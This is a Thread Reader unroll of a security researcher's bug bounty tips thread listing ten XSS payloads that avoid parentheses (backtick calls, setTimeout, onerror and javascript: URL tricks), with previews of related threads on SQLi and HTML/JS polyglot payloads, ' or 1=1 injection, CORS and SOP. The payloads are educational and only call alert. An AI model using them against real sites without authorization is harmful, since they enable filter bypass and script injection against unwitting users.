Share this page!

ro Profile picture
Twitter logo
Sep 21 11 tweets 4 min read
#learn365 - Day 3⃣2⃣

10 XSS payloads that don't need parentheses 😄

#xss #bugbountytips
1. alert`1`

Use backquotes.
2.
window.name="javascript:alert(2)";
location="xss.html";

location=name
3. eval.call`${'alert\x2823\x29'}` by @cure53berlin
4. setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29` by @i_bo0om
5. throw onerror=eval,SyntaxError`alert\x2823\x29` firefox only by @h43z
6. Payload in JSFUCK
7. by @garethheyes
8. onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"

By @aemkei
9. by @BitK_
10. Simple and efficient, got this somewhere in @StackOverflow

document.location='javascript:alert%2823%29'

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with ro

ro Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @sec_r0

ro Profile picture
Sep 5
#Learn365 - Day 1⃣ 7⃣

Since we are talking about Polyglots, today I have SQLi Polyglot for you.
A context insensitive sqli payload polyglot, a thread. 🧵👇

#infosec #appsec #bugbountytips #security Image
When it comes to SQLi, the SQli polygot is the payload that runs in context of ' (single quote) and " (double quote).

E.g
SLEEP(1) /*' or SLEEP(1) or'" or SLEEP(1) or "*/

Will execute in both the contexts.
How ?

Let's see next.
MYSQL_QUERY = "SELECT * FROM users WHERE username = '<input>'" ;

Would turn into

MYSQL_QUERY = "SELECT * FROM users WHERE username = 'SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/" '";

Carefully observe, the Payload is happy. Image
Read 6 tweets
ro Profile picture
Sep 4
#Learn365 - Day 1⃣ 6⃣

Can write single Exploit payload which can exploit both HTML and JS injection in this ?

Yes we can, they are POLYGLOT payloads.
A context sensitive injection payloads, a thread. 🧵👇

#infosec #appsec #bugbountytips #security Image
Polyglot payloads capable of executing in multiple contexts.

A simple Example:
Input is flowing through HTML and JavaScript contenxt both and HTML is executed first then JS.

If you design the payload with JS context, HTML parse would fail, and XSS wont execute.
Which means you have to design your payload which can pass both the contexts and still execute.

In above case there are two contexts,

HTML
&
JS

First HTML context is executed.

Lets take a look at the payload now.
Read 10 tweets
ro Profile picture
Aug 25
#Learn365 - Day 6⃣

Can you identify and exploit the #security bug? 🤔

In today's thread lets learn about exploit writing 🧵👇

#infosec #appsec #bugbountytips #security
This is SQLi. easy to guess. Which field is vulnerable : username.

But the tricky part is how to exploit it.
If you disect the code, you would notice that SQL statement should always return one single word. Otherwise comparison will anyway fail in PHP code.

What next ?
What do you think will happen if I input :

" or 1=1;--

Think first !!
.
.
.
.
.
.
This will make SQL return entire password column.
Inturn, PHP check will fail at line #2.

So, you have to make SQL statement return 1 single word, and that should be password which u can match.
Read 11 tweets
ro Profile picture
Aug 24
#Learn365 - Day 5⃣

CORS Headers. 🤔

What are they ? And how they bypass SOP ?

Learn about them in this thread 🧵👇

#infosec #bugbountytips #CORS #http
In last thread, we talked about SOP, while SOP blocks the response, CORS is use to bypass SOP the most sensible way.

CORS is Cross Origin Resource Sharing.

It allows sharing response across different origins possible. Can we call it Bypassing SOP ?

Yes.
Lets say,

Domain A wants to Talk to Domain B for getting some information.

A
Read 7 tweets
ro Profile picture
Aug 24
My #Learn365 in one single thread.
Read 7 tweets
ro Profile picture
Aug 23
#Learn365 - Day 4⃣

SOP 🫧, Same Origin Policy.
A browser security framework that every #hacker should know.

Know what is it in this thread 🧵👇

#infosec #security #appsec #cybersecurity #SOP #http Image
SOP is browser security model, and I find lot of folks out there, who still dont understand it in and out.
Let me cover it here, in few threads.

Let's Start.
It is a browser security model 🔥. Now what does that means ?
It simply means this control is enforced by browser to make user visiting a site more secure from attackers.

Browser creates virtual boundaries to segregate sites and this boundary is identified with ORIGINS.
Read 9 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

Email the whole thread instead of just a link!

Separate emails with commas

:(